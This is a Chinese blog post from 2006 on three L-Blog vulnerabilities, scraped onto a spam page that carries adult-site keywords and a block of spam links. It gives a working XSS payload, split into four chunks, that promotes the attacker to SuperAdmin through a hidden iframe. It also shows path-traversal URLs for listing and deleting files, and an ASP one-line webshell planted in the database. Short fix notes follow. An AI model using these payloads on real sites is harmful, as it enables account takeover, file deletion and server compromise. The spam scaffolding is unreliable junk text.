成人在线你懂的-成人在线免费小视频-成人在线免费网站-成人在线免费视频观看-日韩精品国产一区二区-日韩精品国产一区

掃一掃
關注微信公眾號

L-Blog的三個漏洞
2006-01-09   http://lake2.0x54.org

L-Blog是由 Loveyuki 自主開發(fā)的基于 ASP+Access 的小型單用戶BLOG,好像網(wǎng)上用的比較多,主要是免費的(呵呵,向Loveyuki致敬)。昨天寢室斷網(wǎng)了,閑著沒事干,就把以前下載的L-Blog V1.08 (SE) Final版本拿來看,結果還真發(fā)現(xiàn)了幾個問題。

1、L-Blog Cross-Site Scripting Vulnerability

這是個跨站漏洞,好像HaK_BaN很早就發(fā)現(xiàn)并通知了官方,所以問題已經(jīng)修復。但是我下的那個版本卻存在,所以還是要寫出來J

問題存在于申請友情鏈接那里,對提交的網(wǎng)站名稱沒有進行HTML編碼就直接寫入數(shù)據(jù)庫,管理員瀏覽讀出的時候也沒有進行編碼,造成跨站腳本漏洞。

怎么利用呢,盜管理員Cookies?太麻煩,其實可以直接用javascript把頁面轉(zhuǎn)向到提升一般用戶為超級管理員的鏈接。

呵呵,那就注冊個帳號先,然后記住帳號的id,然后構造語句咯。

先看看把一般用戶提升成超級管理員的鏈接,http://localhost/L-Blog/admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin,嗯我們可以提交<script>location.href=” admincp.asp?action=member&type=editmem&memID=2&memType=SupAdmin”</script>達到轉(zhuǎn)向的目的。參數(shù)memID就是你要提升權限的用戶id,這里我的id是2。

且慢,這里有兩個問題,第一是數(shù)據(jù)庫Blog_links表里的Link_Name字段最多放50個字符;第二是如果轉(zhuǎn)向管理員會發(fā)現(xiàn)不對勁哦。所以要用拆分字符分次提交,而且使用框架讓管理員看不到。

算了一下,至少要分四次提交,看exploit:

<script>a="<iframe src=admincp.asp?actio"</script>

<script>a+="n=member&type=editmem&memID="</script>

<script>a+="2&memType=SupAdmin width="</script>

<script>a+="0 height=0>";document.write(a);</script>

呵呵,然后就等著管理員去看鏈接驗證咯。要是等不及了可以想辦法讓他去看,看你的社會工程學水平了。

漏洞修補問題,最簡單就是去官方下補丁。

2、L-Blog File List / Delete with SuperAdmin Vulnerability

通過前面的漏洞我們可以成為blog管理員,現(xiàn)在我們得想辦法拿webshell啊。呵呵,這個時候用這個漏洞最好不過了。好像還沒人公布的說。

在附件管理選瀏覽all_files里的文件,看它的URL:http://localhost/L-Blog/admincp.asp?action=attachment&foldername=All_Files,嘿嘿問題就出在參數(shù)foldername,沒有過濾.和/,那就可以跨目錄的哦。用這個url看看http://localhost/L-Blog/admincp.asp?action=attachment&foldername=..,呵呵,怎么樣,blog根目錄文件出來了,可以隨便刪除文件的哦。

利用這個漏洞我們可以任意查看網(wǎng)站各目錄的文件,不過你要猜到文件夾才能瀏覽,L-Blog的數(shù)據(jù)庫放在blogdata下,看看咯:http://localhost/L-Blog/admincp.asp?action=attachment&foldername=../blogdata

如果它的數(shù)據(jù)庫是mdb,那就下載之,如果改成了asp/asa,那就請你看第三個漏洞哈。

這個漏洞的修復就是修改文件admincp.asp,只要把變量Request.QueryString("filename")里的“.”過濾就行了。

3、L-Blog .asp/.asa DataBase Execute ASP Code Vulnerability

L-Blog的默認數(shù)據(jù)庫名字是L-Blog.mdb,但是很多站長應該會改名稱和后綴,一般改為asp或者asa,呵呵,如果改了,那站就完咯。

L-Blog.mdb里面有一個貌似防下載的表aNotDownload,其實一點用都沒有,就算你改了后綴照樣可下載。當然不去下載它,我是要拿webshell。

現(xiàn)在就要向數(shù)據(jù)庫寫小馬咯。

隨便找個沒有過濾html編碼的地方,就找修改一般設置,Blog名稱,填<%execute(request("x"))%>,然后再訪問數(shù)據(jù)庫,看看是不是有類型不匹配錯誤,ok,搞定!

漏洞的修復也簡單,隨便找個動網(wǎng)的數(shù)據(jù)庫,找到notdown表導出到L-Blog的數(shù)據(jù)庫中,呵呵,然后你再訪問數(shù)據(jù)庫試試。世界清靜了……

熱詞搜索:

上一篇:USB線進行雙機互聯(lián)
下一篇:IPC安全防范研究

分享到: 收藏
主站蜘蛛池模板: 杨剑锋个人资料简介| 我们的快乐人生 电视剧| 帕米尔医生电视剧全集免费观看| 张成楚| 749局演员表| 电影《uhaw》完整版在线观看| 松果儿| 远古的传说| 伤痕累累的恶魔| 狗狗交配视频全过程| 覃宏| 天气预报有雨| 乔什布洛林| 电视剧《反击》主要演员| 大海中的船歌词歌谱| 女生被艹在线观看| 炖鲫鱼汤怎么做好喝又营养视频| 红海行动2虎鲸行动电影上映时间| 变形金刚1免费完整版在线观看| 喜欢小红帽的原因怎么写| 色戒.| nanny| 高达w| 挠vk| s0hu搜狐| 神医喜来乐演员表| 成年奶妈| 诗歌繁星| 以家人之名小说原著| 永恒传说图文详细攻略| 视频三级| 深海蛇难 电影| 南来北往老婆别哭100集 | 2014春节联欢晚会| 湖南卫视节目表今天| 心奇爆龙战车5之机甲战陀 2021| 全国面积排名省份| 电影名《走进房间》在线观看| 译码器及其应用实验报告| 快播电影网怡红院| 陷入纯情|